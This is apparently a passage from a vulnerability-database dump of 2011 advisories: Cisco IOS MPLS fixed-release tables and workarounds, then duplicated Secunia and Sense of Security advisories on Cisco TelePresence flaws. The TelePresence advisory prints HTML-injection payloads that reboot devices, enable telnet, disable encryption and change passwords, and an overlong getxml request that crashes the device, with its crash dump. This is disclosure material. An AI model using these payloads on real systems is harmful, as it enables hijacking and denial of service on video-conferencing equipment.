| | | your support |
| | | organization per the |
| 12.2YV | Not vulnerable | instructions in the |
| | | Obtaining Fixed |
| | | Software section of |
| | | this advisory. |
|------------+-----------------------+-----------------------|
| | | Vulnerable; contact |
| | | your support |
| | | organization per the |
| 12.2YW | Not vulnerable | instructions in the |
| | | Obtaining Fixed |
| | | Software section of |
| | | this advisory. |
|------------+-----------------------+-----------------------|
| | | Vulnerable; contact |
| | | your support |
| | | organization per the |
| 12.2YX | Not vulnerable | instructions in the |
| | | Obtaining Fixed |
| | | Software section of |
| | | this advisory. |
|------------+-----------------------+-----------------------|
| | | Vulnerable; contact |
| | | your support |
| | | organization per the |
| 12.2YY | Not vulnerable | instructions in the |
| | | Obtaining Fixed |
| | | Software section of |
| | | this advisory. |
|------------+-----------------------+-----------------------|
| | | Vulnerable; contact |
| | | your support |
| | | organization per the |
| 12.2YZ | Not vulnerable | instructions in the |
| | | Obtaining Fixed |
| | | Software section of |
| | | this advisory. |
|------------+-----------------------+-----------------------|
| | | Vulnerable; first |
| 12.2ZA | Not vulnerable | fixed in Release |
| | | 12.2SXF |
|------------+-----------------------+-----------------------|
| | | Vulnerable; contact |
| | | your support |
| | | organization per the |
| 12.2ZB | Not vulnerable | instructions in the |
| | | Obtaining Fixed |
| | | Software section of |
| | | this advisory. |
|------------+-----------------------+-----------------------|
| 12.2ZC | Not vulnerable | Not vulnerable |
|------------+-----------------------+-----------------------|
| 12.2ZD | Not vulnerable | Not vulnerable |
|------------+-----------------------+-----------------------|
| 12.2ZE | Not vulnerable | Vulnerable; first |
| | | fixed in Release 12.4 |
|------------+-----------------------+-----------------------|
| 12.2ZF | Not vulnerable | Vulnerable; first |
| | | fixed in Release 12.4 |
|------------+-----------------------+-----------------------|
| 12.2ZG | Not vulnerable | Not vulnerable |
|------------+-----------------------+-----------------------|
| 12.2ZH | Not vulnerable | Vulnerable; first |
| | | fixed in Release 12.4 |
|------------+-----------------------+-----------------------|
| 12.2ZJ | Not vulnerable | Not vulnerable |
|------------+-----------------------+-----------------------|
| | | Vulnerable; contact |
| | | your support |
| | | organization per the |
| 12.2ZL | Not vulnerable | instructions in the |
| | | Obtaining Fixed |
| | | Software section of |
| | | this advisory. |
|------------+-----------------------+-----------------------|
| 12.2ZP | Not vulnerable | Not vulnerable |
|------------+-----------------------+-----------------------|
| | | Vulnerable; first |
| 12.2ZU | Not vulnerable | fixed in Release |
| | | 12.2SXH |
|------------+-----------------------+-----------------------|
| 12.2ZX | Not vulnerable | Not vulnerable |
|------------+-----------------------+-----------------------|
| | | Vulnerable; contact |
| | | your support |
| | | organization per the |
| 12.2ZY | Not vulnerable | instructions in the |
| | | Obtaining Fixed |
| | | Software section of |
| | | this advisory. |
|------------+-----------------------+-----------------------|
| | | Vulnerable; contact |
| | | your support |
| | | organization per the |
| 12.2ZYA | Not vulnerable | instructions in the |
| | | Obtaining Fixed |
| | | Software section of |
| | | this advisory. |
|------------+-----------------------+-----------------------|
| Affected | | First Fixed Release |
| 12.3-Based | First Fixed Release | for All Advisories in |
| Releases | For This Advisory | the September 2011 |
| | | Bundled Publication |
|------------------------------------------------------------|
| There are no affected 12.3-based releases |
|------------------------------------------------------------|
| Affected | | First Fixed Release |
| 12.4-Based | First Fixed Release | for All Advisories in |
| Releases | For This Advisory | the September 2011 |
| | | Bundled Publication |
|------------------------------------------------------------|
| There are no affected 12.4-based releases |
|------------------------------------------------------------|
| Affected | | First Fixed Release |
| 15.0-Based | First Fixed Release | for All Advisories in |
| Releases | For This Advisory | the September 2011 |
| | | Bundled Publication |
|------------+-----------------------+-----------------------|
| 15.0M | 15.0(1)M7 | 15.0(1)M7 |
|------------+-----------------------+-----------------------|
| | Vulnerable; contact | Vulnerable; contact |
| | your support | your support |
| | organization per the | organization per the |
| 15.0MR | instructions in the | instructions in the |
| | Obtaining Fixed | Obtaining Fixed |
| | Software section of | Software section of |
| | this advisory. | this advisory. |
|------------+-----------------------+-----------------------|
| | Vulnerable; contact | Vulnerable; contact |
| | your support | your support |
| | organization per the | organization per the |
| 15.0MRA | instructions in the | instructions in the |
| | Obtaining Fixed | Obtaining Fixed |
| | Software section of | Software section of |
| | this advisory. | this advisory. |
|------------+-----------------------+-----------------------|
| 15.0S | See Cisco IOS-XE | See Cisco IOS-XE |
| | Software Availability | Software Availability |
|------------+-----------------------+-----------------------|
| | | Vulnerable; contact |
| | | your support |
| | | organization per the |
| 15.0SA | Not vulnerable | instructions in the |
| | | Obtaining Fixed |
| | | Software section of |
| | | this advisory. |
|------------+-----------------------+-----------------------|
| 15.0SE | Not vulnerable | Not vulnerable |
|------------+-----------------------+-----------------------|
| 15.0SG | See Cisco IOS-XE | See Cisco IOS-XE |
| | Software Availability | Software Availability |
|------------+-----------------------+-----------------------|
| | Vulnerable; first | Vulnerable; first |
| 15.0XA | fixed in Release | fixed in Release |
| | 15.1T | 15.1T |
|------------+-----------------------+-----------------------|
| 15.0XO | See Cisco IOS-XE | See Cisco IOS-XE |
| | Software Availability | Software Availability |
|------------+-----------------------+-----------------------|
| Affected | | First Fixed Release |
| 15.1-Based | First Fixed Release | for All Advisories in |
| Releases | For This Advisory | the September 2011 |
| | | Bundled Publication |
|------------+-----------------------+-----------------------|
| | | Vulnerable; contact |
| | | your support |
| | | organization per the |
| 15.1EY | Not vulnerable | instructions in the |
| | | Obtaining Fixed |
| | | Software section of |
| | | this advisory. |
|------------+-----------------------+-----------------------|
| | Vulnerable; first | Vulnerable; first |
| 15.1GC | fixed in Release | fixed in Release |
| | 15.1T | 15.1T |
|------------+-----------------------+-----------------------|
| 15.1M | 15.1(4)M1 | 15.1(4)M2; Available |
| | | on 30-SEP-11 |
|------------+-----------------------+-----------------------|
| | | Vulnerable; contact |
| | | your support |
| | | organization per the |
| 15.1MR | Not vulnerable | instructions in the |
| | | Obtaining Fixed |
| | | Software section of |
| | | this advisory. |
|------------+-----------------------+-----------------------|
| 15.1S | See Cisco IOS-XE | See Cisco IOS-XE |
| | Software Availability | Software Availability |
|------------+-----------------------+-----------------------|
| | 15.1(1)T4; Available | |
| | on 09-DEC-11 | 15.1(2)T4 |
| 15.1T | | |
| | 15.1(2)T4 | 15.1(1)T4 on |
| | | 8-Dec-2011 |
| | 15.1(3)T2 | |
|------------+-----------------------+-----------------------|
| | Vulnerable; first | Vulnerable; first |
| 15.1XB | fixed in Release | fixed in Release |
| | 15.1T | 15.1T |
|------------+-----------------------+-----------------------|
| Affected | | First Fixed Release |
| 15.2-Based | First Fixed Release | for All Advisories in |
| Releases | For This Advisory | the September 2011 |
| | | Bundled Publication |
|------------------------------------------------------------|
| There are no affected 15.2-based releases |
+------------------------------------------------------------+
Cisco IOS XE Software
+--------------------
Cisco IOS XE Software is affected by the vulnerability disclosed in
this document.
+------------------------------------------------------------+
| Cisco | First Fixed | First Fixed Release for All |
| IOS XE | Release For | Advisories in the September |
| Release | This Advisory | 2011 Bundled Publication |
|----------+----------------+--------------------------------|
| | Vulnerable; | |
| 2.1.x | migrate to | Vulnerable; migrate to 3.3.2S |
| | 3.3.2S or | or later |
| | later | |
|----------+----------------+--------------------------------|
| | Vulnerable; | |
| 2.2.x | migrate to | Vulnerable; migrate to 3.3.2S |
| | 3.3.2S or | or later |
| | later | |
|----------+----------------+--------------------------------|
| | Vulnerable; | |
| 2.3.x | migrate to | Vulnerable; migrate to 3.3.2S |
| | 3.3.2S or | or later |
| | later | |
|----------+----------------+--------------------------------|
| | Vulnerable; | |
| 2.4.x | migrate to | Vulnerable; migrate to 3.3.2S |
| | 3.3.2S or | or later |
| | later | |
|----------+----------------+--------------------------------|
| | Vulnerable; | |
| 2.5.x | migrate to | Vulnerable; migrate to 3.3.2S |
| | 3.3.2S or | or later |
| | later | |
|----------+----------------+--------------------------------|
| | Vulnerable; | |
| 2.6.x | migrate to | Vulnerable; migrate to 3.3.2S |
| | 3.3.2S or | or later |
| | later | |
|----------+----------------+--------------------------------|
| 3.1.xS | 3.1.4S | Vulnerable; migrate to 3.3.2S |
| | | or later |
|----------+----------------+--------------------------------|
| 3.1.xSG | Not vulnerable | Vulnerable; migrate to 3.2.0SG |
| | | or later |
|----------+----------------+--------------------------------|
| | Vulnerable; | |
| 3.2.xS | migrate to | Vulnerable; migrate to 3.3.2S |
| | 3.3.2S or | or later |
| | later | |
|----------+----------------+--------------------------------|
| 3.2.xSG | Not vulnerable | Not vulnerable |
|----------+----------------+--------------------------------|
| 3.3.xS | 3.3.2S | 3.3.2S |
|----------+----------------+--------------------------------|
| 3.4.xS | Not vulnerable | Not vulnerable |
+------------------------------------------------------------+
For mapping of Cisco IOS XE to Cisco IOS releases, please refer to
the Cisco IOS XE 2 Release Notes, Cisco IOS XE 3S Release Notes, and
Cisco IOS XE 3SG Release Notes.
Cisco IOS XR Software
+--------------------
Cisco IOS XR Software is not affected by the vulnerability disclosed
in this document.
Cisco IOS XR Software is not affected by any of the vulnerabilities
in the September 2011 bundled publication.
Workarounds
===========
For both vulnerabilities the following workaround applies:
Disabling MPLS TTL Propagation
+-----------------------------
Disabling MPLS TTL propagation will prevent exploitation of these
vulnerabilities. MPLS TTL propagation will have to be disabled on all
PE routers in the MPLS domain. To disable MPLS TTL propagation, enter
the global configuration command "no mpls ip propagate-ttl". If only "no
mpls ip propagate-ttl forward" is configured, the vulnerabilities could
still be exploited from within the MPLS domain.
For more information about the MPLS TTL propagation command, refer to
the configuration guide at:
http://www.cisco.com/en/US/docs/ios/mpls/command/reference/mp_m1.html#wp1013846
Obtaining Fixed Software
========================
Cisco has released free software updates that address these
vulnerabilities. Prior to deploying software, customers should
consult their maintenance provider or check the software for feature
set compatibility and known issues specific to their environment.
Customers may only install and expect support for the feature
sets they have purchased. By installing, downloading, accessing
or otherwise using such software upgrades, customers agree to be
bound by the terms of Cisco's software license terms found at
http://www.cisco.com/en/US/docs/general/warranty/English/EU1KEN_.html,
or as otherwise set forth at Cisco.com Downloads at
http://www.cisco.com/public/sw-center/sw-usingswc.shtml.
Do not contact psirt@cisco.com or security-alert@cisco.com for
software upgrades.
Customers with Service Contracts
+-------------------------------
Customers with contracts should obtain upgraded software through
their regular update channels. For most customers, this means that
upgrades should be obtained through the Software Center on Cisco's
worldwide website at http://www.cisco.com.
Customers using Third Party Support Organizations
+------------------------------------------------
Customers whose Cisco products are provided or maintained through
prior or existing agreements with third-party support organizations,
such as Cisco Partners, authorized resellers, or service providers
should contact that support organization for guidance and assistance
with the appropriate course of action in regards to this advisory.
The effectiveness of any workaround or fix is dependent on specific
customer situations, such as product mix, network topology, traffic
behavior, and organizational mission. Due to the variety of affected
products and releases, customers should consult with their service
provider or support organization to ensure any applied workaround or
fix is the most appropriate for use in the intended network before it
is deployed.
Customers without Service Contracts
+----------------------------------
Customers who purchase direct from Cisco but do not hold a Cisco
service contract, and customers who purchase through third-party
vendors but are unsuccessful in obtaining fixed software through
their point of sale should acquire upgrades by contacting the Cisco
Technical Assistance Center (TAC). TAC contacts are as follows.
* +1 800 553 2447 (toll free from within North America)
* +1 408 526 7209 (toll call from anywhere in the world)
* e-mail: tac@cisco.com
Customers should have their product serial number available and be
prepared to give the URL of this notice as evidence of entitlement to
a free upgrade. Free upgrades for non-contract customers must be
requested through the TAC.
Refer to http://www.cisco.com/en/US/support/
tsd_cisco_worldwide_contacts.html for additional TAC contact
information, including localized telephone numbers, and instructions
and e-mail addresses for use in various languages.
Exploitation and Public Announcements
=====================================
The Cisco PSIRT is not aware of any public announcements or malicious
use of the vulnerabilities described in this advisory.
These vulnerabilities were discovered when handling customer support
calls.
Status of this Notice: FINAL
============================
THIS DOCUMENT IS PROVIDED ON AN "AS IS" BASIS AND DOES NOT IMPLY ANY
KIND OF GUARANTEE OR WARRANTY, INCLUDING THE WARRANTIES OF
MERCHANTABILITY OR FITNESS FOR A PARTICULAR USE. YOUR USE OF THE
INFORMATION ON THE DOCUMENT OR MATERIALS LINKED FROM THE DOCUMENT IS
AT YOUR OWN RISK. CISCO RESERVES THE RIGHT TO CHANGE OR UPDATE THIS
DOCUMENT AT ANY TIME.
A stand-alone copy or Paraphrase of the text of this document that
omits the distribution URL in the following section is an
uncontrolled copy, and may lack important information or contain
factual errors.
Distribution
============
This advisory is posted on Cisco's worldwide website at:
http://www.cisco.com/warp/public/707/cisco-sa-20110928-ipv6mpls.shtml
In addition to worldwide web posting, a text version of this notice
is clear-signed with the Cisco PSIRT PGP key and is posted to the
following e-mail and Usenet news recipients.
* cust-security-announce@cisco.com
* first-bulletins@lists.first.org
* bugtraq@securityfocus.com
* vulnwatch@vulnwatch.org
* cisco@spot.colorado.edu
* cisco-nsp@puck.nether.net
* full-disclosure@lists.grok.org.uk
* comp.dcom.sys.cisco@newsgate.cisco.com
Future updates of this advisory, if any, will be placed on Cisco's
worldwide website, but may or may not be actively announced on
mailing lists or newsgroups. Users concerned about this problem are
encouraged to check the above URL for any updates.
Revision History
================
+------------------------------------------------------------+
| Revision 1.0 | 2011-September-28 | Initial public release |
+------------------------------------------------------------+
Cisco Security Procedures
=========================
Complete information on reporting security vulnerabilities
in Cisco products, obtaining assistance with security
incidents, and registering to receive security information
from Cisco, is available on Cisco's worldwide website at
http://www.cisco.com/en/US/products/products_security_vulnerability_policy.html.
This includes instructions for press inquiries regarding
Cisco security notices. All Cisco security advisories are available at
http://www.cisco.com/go/psirt.
+--------------------------------------------------------------------
Copyright 2010-2011 Cisco Systems, Inc. All rights reserved.
+--------------------------------------------------------------------
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.11 (GNU/Linux)
iF4EAREIAAYFAk6Cp2QACgkQQXnnBKKRMNBQSAD9F2jD01t7WK98WW1TcHuB0ORh
ttZaRD2ayENEbxklbQgA/j6rRzsG/jk1QW1pJjZme3WKwdvNLy9BzRPTsONBz5Cv
=kk0N
-----END PGP SIGNATURE-----
| VAR-201109-0074 | CVE-2011-2543 |
Cisco Telepresence System Integrator C of cuil Component buffer overflow vulnerability
Related entries in the VARIoT exploits database: VAR-E-201108-0204 |
CVSS V2: 9.0 CVSS V3: - Severity: HIGH |
Buffer overflow in the cuil component in Cisco Telepresence System Integrator C Series 4.x before TC4.2.0 allows remote authenticated users to cause a denial of service (endpoint reboot or process crash) or possibly execute arbitrary code via a long location parameter to the getxml program, aka Bug ID CSCtq46496. Cisco Telepresence System Integrator C of cuil The component contains a buffer overflow vulnerability. Cisco TelePresence Endpoint is prone to memory-corruption and HTML-injection vulnerabilities.
An attacker can exploit the HTML-injection issue to execute arbitrary script code in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials. Other attacks are also possible.
An attacker can exploit the memory-corruption issue to execute arbitrary code in the context of the application. Failed attacks will cause denial-of-service conditions. The solution provides components such as audio and video spaces, which can provide remote participants with a "face-to-face" virtual meeting room effect. ----------------------------------------------------------------------
Ovum says ad hoc tools are out-dated. The best practice approach?
Fast vulnerability intelligence, threat handling, and setup in one tool.
Read the new report on the Secunia VIM:
http://secunia.com/products/corporate/vim/ovum_2011_request/
----------------------------------------------------------------------
TITLE:
TANDBERG C Series Endpoints Script Insertion and Denial of Service
Vulnerabilities
SECUNIA ADVISORY ID:
SA46057
VERIFY ADVISORY:
Secunia.com
http://secunia.com/advisories/46057/
Customer Area (Credentials Required)
https://ca.secunia.com/?page=viewadvisory&vuln_id=46057
RELEASE DATE:
2011-09-22
DISCUSS ADVISORY:
http://secunia.com/advisories/46057/#comments
AVAILABLE ON SITE AND IN CUSTOMER AREA:
* Last Update
* Popularity
* Comments
* Criticality Level
* Impact
* Where
* Solution Status
* Operating System / Software
* CVE Reference(s)
http://secunia.com/advisories/46057/
ONLY AVAILABLE IN CUSTOMER AREA:
* Authentication Level
* Report Reliability
* Secunia PoC
* Secunia Analysis
* Systems Affected
* Approve Distribution
* Remediation Status
* Secunia CVSS Score
* CVSS
https://ca.secunia.com/?page=viewadvisory&vuln_id=46057
ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI:
* AUTOMATED SCANNING
http://secunia.com/vulnerability_scanning/personal/
http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/
DESCRIPTION:
Two vulnerabilities have been reported in TANDBERG C Series
Endpoints, which can be exploited by malicious users to conduct
script insertion attacks and cause a DoS (Denial of Service).
1) Input passed as the Call ID when calling another endpoint is not
properly sanitised before being used. This can be exploited to insert
arbitrary HTML and script code, which will be executed on an affected
device when the malicious data is being viewed.
2) An error in the tshell application can be exploited to dereference
an invalid memory address via overly long strings passed via the
"location" parameter to the getXML script.
The vulnerabilities are reported in version 4.1.2 and prior.
SOLUTION:
Update to version 4.2.0, which fixes vulnerability #2. Filter
malicious characters and character sequences using a proxy.
ORIGINAL ADVISORY:
http://www.senseofsecurity.com.au/advisories/SOS-11-010
OTHER REFERENCES:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
DEEP LINKS:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
EXTENDED DESCRIPTION:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
EXTENDED SOLUTION:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
EXPLOIT:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
----------------------------------------------------------------------
About:
This Advisory was delivered by Secunia as a free service to help
private users keeping their systems up to date against the latest
vulnerabilities.
Subscribe:
http://secunia.com/advisories/secunia_security_advisories/
Definitions: (Criticality, Where etc.)
http://secunia.com/advisories/about_secunia_advisories/
Please Note:
Secunia recommends that you verify all advisories you receive by
clicking the link.
Secunia NEVER sends attached files with advisories.
Secunia does not advise people to install third party patches, only
use those supplied by the vendor. Sense of Security - Security Advisory - SOS-11-010
Release Date. 19-Sep-2011
Last Update. -
Vendor Notification Date. 21-Feb-2011
Product. Cisco
Affected versions. C <= TC4.1.2, MXP <= F9.1
Severity Rating. Low - Medium
Impact. Cookie/credential theft,
impersonation,
loss of confidentiality,
client-side code execution,
denial of service.
Solution Status. Vendor patch
References. 1. CVE-2011-2544 (CSCtq46488)
2. CVE-2011-2543 (CSCtq46496)
3. CVE-2011-2577 (CSCtq46500)
Details.
Cisco TelePresence is an umbrella term for Video Conferencing Hardware
and Software, Infrastructure and Endpoints. The C & MXP Series are the
Endpoints used on desks or in boardrooms to provide users with a
termination point for Video Conferencing.
1. Post-authentication HTML Injection - CVE-2011-2544 (CSCtq46488):
Cisco TelePresence Endpoints have a web interface (HTTP or HTTPS) for
managing, configuring and reporting. It is possible to set the Call ID
(with H.323 or SIP) to a HTML value. If a call is made to another
endpoint and an authenticated user browses to the web interface on the
endpoint receiving the call (e.g. to view call statistics), the
HTML will render locally within the context of the logged in user. From
this point it is possible to make changes to the system as the
authenticated user. The flaw is due to the flexibility of the H.323 ID
or SIP Display Name fields and failure to correctly validate user input.
Examples (MXP):
Rebooting the system: <IMG SRC="/reboot&Yes=please">
The attacker may also choose to change passwords in the system, disable
encryption or enable telnet:
<IMG SRC=/html_select_status?reload=other.ssi&telnet=On>
<IMG SRC=/html_select_status?reload=security.ssi&/Configuration/
Conference/Encryption/Mode=Off&/Configuration/SystemUnit/Password=test>
2. Post-authentication Memory Corruption - CVE-2011-2543 (CSCtq46496):
Cisco TelePresence systems (Endpoints and Infrastructure) use XPath for
setting and getting configuration.
Example syntax is:
http://ip/getxml?location=/Configuration/Video
The request is sent to a locally listening shell (tshell). This is the
case for all requests relating to performing an action on the system (e.g.
config get or set). The shell then sends the input to the "main"
application (/app/main, id=0), and the data is passed as a parameter.
It was discovered that the getXML handle does not properly perform
length checking on the user supplied input before passing it to the
tshell. Furthermore, there is no length checking performed in the tshell
and no bounds checking performed in the main application where the
parameter is consumed. As such, it is possible to send input that
exceeds the size of the receiving buffer, subsequently causing an
invalid address to be read. This causes a reboot on the Endpoints. The
VCS will not reboot, the process will crash by SIGSEGV (or sigabrt) but
it will restart the process itself which drops all calls.
Proof of Concept: GET
/wsgi/getxml?location="+("A"*5200)+("\x60"*4)+("X"*4)+"HTTP/1.1\r\n
Host: 192.168.6.99\r\n\r\n"
Received signal SIGSEGV (11) in thread 0x129e8480, TID 2670
Illegal memory access at: 0x5858585c
Registers:
GPR00: 00f2c908 129e5960 129ef920 00000005 00000040 0000000c 00000037
0f315580
GPR08: 00000005 129e5a70 129e5a80 58585858 0f3272d4 11589858 129e6896
0000000b
GPR16: 129e6084 11164a1c 00000000 129e6894 00000037 1299ca18 00000005
00000002
GPR24: 129e59a8 00000002 0f3ea3a4 129e5a64 00000037 00000005 0f410bac
129e5960
GPR24: 129e59a8 00000002 0f3ea3a4 129e5a64 00000037 00000005 0f410bac
129e5960
NIP: 0f39abc8 MSR: 0000d032 OGPR3: 00000002
As you can see, the crash string is passed as a parameter in GPR 8.
3. Pre-authentication SIP Denial of Service - CVE-2011-2577 (CSCtq46500):
Cisco TelePresence Endpoints utilise SIP for the call setup protocol.
Sending a SIP INVITE with a 4x8 a"s in the MAC Address field and the
receive field causes the system to reboot.
Proof of Concept: MXP:
Exception 0x1100 : Data TLB load miss Active task
FsmMain FSM process : SipTrnsp(0) FSM message : SipTrnsp_Send_Msg_Req
from SipTrnsp(0) Data TLB miss (DMISS) : 0x00000000 (illegal addr.
accessed)
Solution.
Upgrade to TC4.2 for the C series to fix validation issues.
Discovered by.
David Klein, Sense of Security Labs.
About us.
Sense of Security is a leading provider of information
security and risk management solutions. Our team has expert
skills in assessment and assurance, strategy and architecture,
and deployment through to ongoing management. We are
Australia's premier application penetration testing firm and
trusted IT security advisor to many of the countries largest
organisations.
Sense of Security Pty Ltd
Level 8, 66 King St
Sydney NSW 2000
AUSTRALIA
T: +61 (0)2 9290 4444
F: +61 (0)2 9290 4455
W: http://www.senseofsecurity.com.au
E: info@senseofsecurity.com.au
Twitter: @ITsecurityAU
The latest version of this advisory can be found at:
http://www.senseofsecurity.com.au/advisories/SOS-11-010.pdf
Other Sense of Security advisories can be found at:
http://www.senseofsecurity.com.au/research/it-security-advisories.php
.
Restrict access to trusted users only
| VAR-201109-0075 | CVE-2011-2544 |
Cisco TelePresence System MXP of Web Interface cross-site scripting vulnerability
Related entries in the VARIoT exploits database: VAR-E-201108-0204 |
CVSS V2: 3.5 CVSS V3: - Severity: LOW |
Cross-site scripting (XSS) vulnerability in the web interface in Cisco TelePresence System MXP Series F9.1 and earlier allows remote authenticated users to inject arbitrary web script or HTML via a crafted Call ID, as demonstrated by resultant cross-site request forgery (CSRF) attacks that change passwords or cause a denial of service, aka Bug ID CSCtq46488. Cisco TelePresence System MXP of Web The interface contains a cross-site scripting vulnerability. The problem is Bug ID CSCtq46488 It is a problem.A crafted call by a remotely authenticated user ID Through any Web Script or HTML May be inserted. Cisco TelePresence Endpoint is prone to memory-corruption and HTML-injection vulnerabilities.
An attacker can exploit the HTML-injection issue to execute arbitrary script code in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials. Other attacks are also possible.
An attacker can exploit the memory-corruption issue to execute arbitrary code in the context of the application. Failed attacks will cause denial-of-service conditions. The solution provides components such as audio and video spaces, which can provide remote participants with a "face-to-face" virtual meeting room effect. Steal cookie authentication configuration. ----------------------------------------------------------------------
Ovum says ad hoc tools are out-dated. The best practice approach?
Fast vulnerability intelligence, threat handling, and setup in one tool.
Read the new report on the Secunia VIM:
http://secunia.com/products/corporate/vim/ovum_2011_request/
----------------------------------------------------------------------
TITLE:
TANDBERG C Series Endpoints Script Insertion and Denial of Service
Vulnerabilities
SECUNIA ADVISORY ID:
SA46057
VERIFY ADVISORY:
Secunia.com
http://secunia.com/advisories/46057/
Customer Area (Credentials Required)
https://ca.secunia.com/?page=viewadvisory&vuln_id=46057
RELEASE DATE:
2011-09-22
DISCUSS ADVISORY:
http://secunia.com/advisories/46057/#comments
AVAILABLE ON SITE AND IN CUSTOMER AREA:
* Last Update
* Popularity
* Comments
* Criticality Level
* Impact
* Where
* Solution Status
* Operating System / Software
* CVE Reference(s)
http://secunia.com/advisories/46057/
ONLY AVAILABLE IN CUSTOMER AREA:
* Authentication Level
* Report Reliability
* Secunia PoC
* Secunia Analysis
* Systems Affected
* Approve Distribution
* Remediation Status
* Secunia CVSS Score
* CVSS
https://ca.secunia.com/?page=viewadvisory&vuln_id=46057
ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI:
* AUTOMATED SCANNING
http://secunia.com/vulnerability_scanning/personal/
http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/
DESCRIPTION:
Two vulnerabilities have been reported in TANDBERG C Series
Endpoints, which can be exploited by malicious users to conduct
script insertion attacks and cause a DoS (Denial of Service).
1) Input passed as the Call ID when calling another endpoint is not
properly sanitised before being used. This can be exploited to insert
arbitrary HTML and script code, which will be executed on an affected
device when the malicious data is being viewed.
2) An error in the tshell application can be exploited to dereference
an invalid memory address via overly long strings passed via the
"location" parameter to the getXML script.
The vulnerabilities are reported in version 4.1.2 and prior.
SOLUTION:
Update to version 4.2.0, which fixes vulnerability #2. Filter
malicious characters and character sequences using a proxy.
ORIGINAL ADVISORY:
http://www.senseofsecurity.com.au/advisories/SOS-11-010
OTHER REFERENCES:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
DEEP LINKS:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
EXTENDED DESCRIPTION:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
EXTENDED SOLUTION:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
EXPLOIT:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
----------------------------------------------------------------------
About:
This Advisory was delivered by Secunia as a free service to help
private users keeping their systems up to date against the latest
vulnerabilities.
Subscribe:
http://secunia.com/advisories/secunia_security_advisories/
Definitions: (Criticality, Where etc.)
http://secunia.com/advisories/about_secunia_advisories/
Please Note:
Secunia recommends that you verify all advisories you receive by
clicking the link.
Secunia NEVER sends attached files with advisories.
Secunia does not advise people to install third party patches, only
use those supplied by the vendor. Sense of Security - Security Advisory - SOS-11-010
Release Date. 19-Sep-2011
Last Update. -
Vendor Notification Date. 21-Feb-2011
Product. Cisco
Affected versions. C <= TC4.1.2, MXP <= F9.1
Severity Rating. Low - Medium
Impact. Cookie/credential theft,
impersonation,
loss of confidentiality,
client-side code execution,
denial of service.
Solution Status. Vendor patch
References. 1. CVE-2011-2544 (CSCtq46488)
2. CVE-2011-2543 (CSCtq46496)
3. CVE-2011-2577 (CSCtq46500)
Details.
Cisco TelePresence is an umbrella term for Video Conferencing Hardware
and Software, Infrastructure and Endpoints. The C & MXP Series are the
Endpoints used on desks or in boardrooms to provide users with a
termination point for Video Conferencing.
1. Post-authentication HTML Injection - CVE-2011-2544 (CSCtq46488):
Cisco TelePresence Endpoints have a web interface (HTTP or HTTPS) for
managing, configuring and reporting. It is possible to set the Call ID
(with H.323 or SIP) to a HTML value. If a call is made to another
endpoint and an authenticated user browses to the web interface on the
endpoint receiving the call (e.g. to view call statistics), the
HTML will render locally within the context of the logged in user. From
this point it is possible to make changes to the system as the
authenticated user. The flaw is due to the flexibility of the H.323 ID
or SIP Display Name fields and failure to correctly validate user input.
Examples (MXP):
Rebooting the system: <IMG SRC="/reboot&Yes=please">
The attacker may also choose to change passwords in the system, disable
encryption or enable telnet:
<IMG SRC=/html_select_status?reload=other.ssi&telnet=On>
<IMG SRC=/html_select_status?reload=security.ssi&/Configuration/
Conference/Encryption/Mode=Off&/Configuration/SystemUnit/Password=test>
2. Post-authentication Memory Corruption - CVE-2011-2543 (CSCtq46496):
Cisco TelePresence systems (Endpoints and Infrastructure) use XPath for
setting and getting configuration.
Example syntax is:
http://ip/getxml?location=/Configuration/Video
The request is sent to a locally listening shell (tshell). This is the
case for all requests relating to performing an action on the system (e.g.
config get or set). The shell then sends the input to the "main"
application (/app/main, id=0), and the data is passed as a parameter.
It was discovered that the getXML handle does not properly perform
length checking on the user supplied input before passing it to the
tshell. Furthermore, there is no length checking performed in the tshell
and no bounds checking performed in the main application where the
parameter is consumed. As such, it is possible to send input that
exceeds the size of the receiving buffer, subsequently causing an
invalid address to be read. This causes a reboot on the Endpoints. The
VCS will not reboot, the process will crash by SIGSEGV (or sigabrt) but
it will restart the process itself which drops all calls.
Proof of Concept: GET
/wsgi/getxml?location="+("A"*5200)+("\x60"*4)+("X"*4)+"HTTP/1.1\r\n
Host: 192.168.6.99\r\n\r\n"
Received signal SIGSEGV (11) in thread 0x129e8480, TID 2670
Illegal memory access at: 0x5858585c
Registers:
GPR00: 00f2c908 129e5960 129ef920 00000005 00000040 0000000c 00000037
0f315580
GPR08: 00000005 129e5a70 129e5a80 58585858 0f3272d4 11589858 129e6896
0000000b
GPR16: 129e6084 11164a1c 00000000 129e6894 00000037 1299ca18 00000005
00000002
GPR24: 129e59a8 00000002 0f3ea3a4 129e5a64 00000037 00000005 0f410bac
129e5960
GPR24: 129e59a8 00000002 0f3ea3a4 129e5a64 00000037 00000005 0f410bac
129e5960
NIP: 0f39abc8 MSR: 0000d032 OGPR3: 00000002
As you can see, the crash string is passed as a parameter in GPR 8.
3. Pre-authentication SIP Denial of Service - CVE-2011-2577 (CSCtq46500):
Cisco TelePresence Endpoints utilise SIP for the call setup protocol.
Sending a SIP INVITE with a 4x8 a"s in the MAC Address field and the
receive field causes the system to reboot.
Proof of Concept: MXP:
Exception 0x1100 : Data TLB load miss Active task
FsmMain FSM process : SipTrnsp(0) FSM message : SipTrnsp_Send_Msg_Req
from SipTrnsp(0) Data TLB miss (DMISS) : 0x00000000 (illegal addr.
accessed)
Solution.
Upgrade to TC4.2 for the C series to fix validation issues.
Discovered by.
David Klein, Sense of Security Labs.
About us.
Sense of Security is a leading provider of information
security and risk management solutions. Our team has expert
skills in assessment and assurance, strategy and architecture,
and deployment through to ongoing management. We are
